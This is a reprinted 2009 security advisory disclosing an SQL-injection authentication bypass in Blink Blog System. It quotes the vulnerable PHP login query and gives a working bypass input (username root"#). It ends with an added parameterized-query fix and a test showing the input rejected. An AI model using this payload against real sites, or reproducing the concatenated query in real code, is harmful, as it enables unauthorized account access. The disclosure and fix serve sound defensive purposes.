Securityvulns SECURITYVULNS:DOC:22248
History: Aug 03, 2009 - 12:00 a.m.

Blink Blog System Authentication Bypass

vulners.com

******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

There are many SQL injection flaws, but I post only
the one that allows a guest to bypass the login.

  • [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

    ...

    $username = $_POST["nick"];
    $password = md5($_POST["password"]);
    if ($data = $DB->usercheck($username, $password))

    ...

db.php:

    function usercheck($username, $password)
    {
        $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");

    ...

[+] Code

  • [A] Authentication Bypass

username: root"#
password: foo


[+] Fix

No fix.
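
The string concatenation in usercheck() can be replaced with a parameterized query. The following is an added example, not part of the advisory or of the Blink Blog System code. It assumes PDO with a constructed in-memory SQLite table in place of the application's MySQL connection, and a usercheck() that takes the connection as its first argument.

```php
<?php
// Added example: parameterized replacement for usercheck() in db.php.
// Assumptions: PDO over an in-memory SQLite database stands in for the
// application's MySQL connection; the users table and its row are constructed.

function usercheck(PDO $db, string $username, string $password)
{
    // Placeholders keep the values out of the SQL text, so a quote or
    // comment character in $username cannot alter the WHERE clause.
    $stmt = $db->prepare(
        'SELECT * FROM users WHERE nick = :nick AND password = :password'
    );
    $stmt->execute([':nick' => $username, ':password' => $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (nick TEXT PRIMARY KEY, password TEXT)');

// Constructed account; the password is stored as md5, as login.php expects.
$ins = $db->prepare('INSERT INTO users (nick, password) VALUES (?, ?)');
$ins->execute(['root', md5('correct-password')]);

// Same flow as login.php: nick passed verbatim, password md5-hashed.
$cases = [
    'valid credentials' => ['root', 'correct-password'],
    'wrong password'    => ['root', 'foo'],
    'advisory input'    => ['root"#', 'foo'],
];

foreach ($cases as $label => [$nick, $pass]) {
    $data = usercheck($db, $nick, md5($pass));
    printf("%-18s => %s\n", $label, $data ? 'login accepted' : 'login rejected');
}
```

With bound parameters the fix no longer depends on the magic_quotes_gpc setting listed under Requisites.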